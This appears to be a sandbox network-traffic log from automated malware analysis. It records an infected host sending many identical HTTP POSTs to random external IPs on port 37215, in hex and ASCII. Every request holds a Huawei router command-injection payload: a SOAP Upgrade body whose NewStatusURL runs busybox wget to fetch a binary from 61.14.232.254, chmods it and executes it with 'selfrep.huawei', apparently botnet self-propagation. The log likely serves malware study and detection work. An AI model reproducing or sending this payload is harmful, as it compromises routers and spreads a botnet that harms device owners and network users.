                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1439192.168.2.1348668157.164.192.15137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.561904907 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1440192.168.2.135982241.230.255.5337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.561923027 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1441192.168.2.1346816197.19.126.19037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.561939955 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1442192.168.2.133394041.32.85.16037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.561948061 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1443192.168.2.1333426197.162.206.18437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.561980009 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1444192.168.2.1347550197.154.178.3937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.561981916 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1445192.168.2.1350268197.97.5.19337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.562005997 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1446192.168.2.134690441.96.237.19437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.562021971 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1447192.168.2.1343558157.57.136.3337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.562033892 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1448192.168.2.1356164161.203.96.22337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.562035084 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 